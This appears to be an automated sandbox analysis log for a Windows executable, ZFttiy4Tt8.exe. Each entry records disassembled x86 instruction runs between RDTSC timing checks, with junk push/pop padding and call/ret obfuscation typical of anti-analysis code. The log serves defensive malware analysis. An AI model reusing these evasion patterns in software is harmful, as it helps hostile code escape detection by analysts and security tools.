Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1659904 second address: 1659913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 165997D second address: 1659981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1659981 second address: 1659A1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FB6E8B0AED8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jmp 00007FB6E8B0AEDBh 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d mov dword ptr [ebp+129C586Ch], edx 0x00000033 pop edi 0x00000034 push 9C732650h 0x00000039 jmp 00007FB6E8B0AEDAh 0x0000003e add dword ptr [esp], 638CDA30h 0x00000045 jmp 00007FB6E8B0AEDBh 0x0000004a push 00000003h 0x0000004c movsx ecx, si 0x0000004f push 00000000h 0x00000051 or esi, dword ptr [ebp+129C2BFEh] 0x00000057 push 00000003h 0x00000059 mov esi, dword ptr [ebp+129C346Dh] 0x0000005f call 00007FB6E8B0AED9h 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FB6E8B0AEDFh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1659A1D second address: 1659A50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB6E8B0C7F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1659A50 second address: 1659A5E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1659A5E second address: 1659A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push ecx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 jo 00007FB6E8B0C7ECh 0x00000019 ja 00007FB6E8B0C7E6h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 jo 00007FB6E8B0C7FCh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1659A98 second address: 1659AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e ja 00007FB6E8B0AED8h 0x00000014 pop edi 0x00000015 pop eax 0x00000016 mov dword ptr [ebp+129C2E1Eh], edi 0x0000001c lea ebx, dword ptr [ebp+12B4B520h] 0x00000022 mov dword ptr [ebp+129C17A6h], edi 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a jmp 00007FB6E8B0AEDAh 0x0000002f pushad 0x00000030 jmp 00007FB6E8B0AEDFh 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push edx 0x0000003d jmp 00007FB6E8B0AEDEh 0x00000042 pop edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167BFAC second address: 167BFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 163A97E second address: 163A997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB6E8B0AED6h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FB6E8B0AED6h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 163A997 second address: 163A99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167A281 second address: 167A285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167A285 second address: 167A28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167A934 second address: 167A950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167AAD6 second address: 167AADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167AADC second address: 167AAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167ADBB second address: 167ADC0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167AEF9 second address: 167AF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEDEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167AF0D second address: 167AF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 164CF66 second address: 164CF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 164CF6E second address: 164CF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 164CF74 second address: 164CF7E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB6E8B0AED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167B1E6 second address: 167B201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167B733 second address: 167B737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167B883 second address: 167B889 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167BB14 second address: 167BB59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FB6E8B0AEE5h 0x0000000c jnl 00007FB6E8B0AED6h 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007FB6E8B0AED6h 0x0000001d jmp 00007FB6E8B0AEE8h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167BB59 second address: 167BB5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167BB5D second address: 167BB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167BB6B second address: 167BB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167BDBB second address: 167BDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167BDBF second address: 167BDEC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB6E8B0C7E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FB6E8B0C7E8h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jp 00007FB6E8B0C7E6h 0x0000001c push edx 0x0000001d pop edx 0x0000001e jne 00007FB6E8B0C7E6h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167BDEC second address: 167BDF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 167DFC0 second address: 167DFCA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB6E8B0C7ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1682907 second address: 1682922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1684219 second address: 168421D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1687FAA second address: 1687FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1687B54 second address: 1687B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1687B58 second address: 1687B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168AF8A second address: 168AF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168AF90 second address: 168AF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168B513 second address: 168B519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168B74F second address: 168B753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168D054 second address: 168D058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168D5D6 second address: 168D5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168E0A4 second address: 168E0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0C7F0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168E0B8 second address: 168E0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168DE7F second address: 168DE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168DE83 second address: 168DE87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168DE87 second address: 168DE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168E8F2 second address: 168E8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 168F110 second address: 168F19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB6E8B0C7E6h 0x0000000a popad 0x0000000b jns 00007FB6E8B0C7E8h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov si, di 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FB6E8B0C7E8h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov esi, dword ptr [ebp+129C2A52h] 0x0000003a adc edi, 6AE46865h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FB6E8B0C7E8h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c jc 00007FB6E8B0C7ECh 0x00000062 mov esi, dword ptr [ebp+129C3A26h] 0x00000068 jne 00007FB6E8B0C7E8h 0x0000006e xchg eax, ebx 0x0000006f pushad 0x00000070 jp 00007FB6E8B0C7ECh 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1690644 second address: 16906DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FB6E8B0AED8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 sub dword ptr [ebp+129C36A7h], esi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FB6E8B0AED8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 jmp 00007FB6E8B0AEE7h 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c jmp 00007FB6E8B0AEDCh 0x00000051 jmp 00007FB6E8B0AEE2h 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jnp 00007FB6E8B0AED8h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1690407 second address: 169040C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16928E2 second address: 169290E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FB6E8B0AEE8h 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FB6E8B0AED8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169290E second address: 1692918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB6E8B0C7E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1693EEB second address: 1693EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169318B second address: 1693191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1693EEF second address: 1693EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1693191 second address: 1693195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1694406 second address: 1694415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FB6E8B0AED6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1694415 second address: 1694419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16953FB second address: 16954A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007FB6E8B0AED8h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 jmp 00007FB6E8B0AEE3h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FB6E8B0AED8h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 jmp 00007FB6E8B0AEDBh 0x00000046 call 00007FB6E8B0AEDCh 0x0000004b jmp 00007FB6E8B0AEE6h 0x00000050 pop edi 0x00000051 push 00000000h 0x00000053 mov di, FAD6h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jc 00007FB6E8B0AED6h 0x00000061 jmp 00007FB6E8B0AEE7h 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1696395 second address: 16963B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1695660 second address: 1695664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16963B2 second address: 16963B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1695664 second address: 1695687 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FB6E8B0AEE3h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16963B7 second address: 1696411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FB6E8B0C7E8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+12B71AD2h], edi 0x0000002d push 00000000h 0x0000002f add ebx, dword ptr [ebp+129C5872h] 0x00000035 xchg eax, esi 0x00000036 jmp 00007FB6E8B0C7EFh 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f jns 00007FB6E8B0C7E6h 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169838B second address: 1698395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB6E8B0AED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1698395 second address: 1698399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1698399 second address: 16983A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169B064 second address: 169B068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169BF9A second address: 169BFAC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FB6E8B0AED6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169BFAC second address: 169BFB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169B1A3 second address: 169B244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+129C1BA6h], ebx 0x00000012 sub edi, dword ptr [ebp+129C2C3Ah] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f jns 00007FB6E8B0AEDCh 0x00000025 add dword ptr [ebp+12B4C6E9h], edx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 jmp 00007FB6E8B0AEDBh 0x00000037 mov eax, dword ptr [ebp+129C01ADh] 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007FB6E8B0AED8h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 jmp 00007FB6E8B0AEDBh 0x0000005c push FFFFFFFFh 0x0000005e mov dword ptr [ebp+129C3A26h], ecx 0x00000064 mov edi, dword ptr [ebp+129C3A4Fh] 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f je 00007FB6E8B0AED6h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169B244 second address: 169B25A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169B25A second address: 169B274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0AEE6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169D058 second address: 169D05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169D05C second address: 169D062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 169E2CF second address: 169E2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
